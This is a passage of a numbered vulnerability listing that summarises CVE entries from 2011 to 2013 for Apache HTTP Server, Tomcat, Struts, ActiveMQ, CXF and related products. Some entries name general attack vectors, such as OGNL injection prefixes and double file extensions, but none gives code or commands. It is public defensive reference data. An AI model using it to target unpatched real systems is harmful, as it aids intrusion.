2965| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
2966| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
2967| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
2968| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
3088| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
